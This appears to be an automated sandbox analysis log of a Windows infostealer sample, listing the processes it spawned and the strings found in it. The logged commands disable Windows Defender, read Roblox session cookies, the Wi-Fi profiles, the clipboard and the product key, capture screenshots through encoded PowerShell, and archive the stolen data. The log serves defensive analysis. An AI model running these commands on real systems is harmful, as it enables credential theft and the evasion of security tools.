              Source: e45AiBoV6X.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: e45AiBoV6X.exeVirustotal: Detection: 50%
              Source: e45AiBoV6X.exeReversingLabs: Detection: 47%
              Source: e45AiBoV6X.exeString found in binary or memory: id-cmc-addExtensions
              Source: e45AiBoV6X.exeString found in binary or memory: set-addPolicy
              Source: e45AiBoV6X.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: e45AiBoV6X.exeString found in binary or memory: --help
              Source: e45AiBoV6X.exeString found in binary or memory: --help
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile read: C:\Users\user\Desktop\e45AiBoV6X.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\e45AiBoV6X.exe "C:\Users\user\Desktop\e45AiBoV6X.exe"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Users\user\Desktop\e45AiBoV6X.exe "C:\Users\user\Desktop\e45AiBoV6X.exe"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGM
AcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbg
AoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA594.tmp" "c:\Users\user\AppData\Local\Temp\bohkan2x\CSC24344491B9A34B60B194FE692FA1E0E5.TMP"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Users\user\Desktop\e45AiBoV6X.exe "C:\Users\user\Desktop\e45AiBoV6X.exe"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
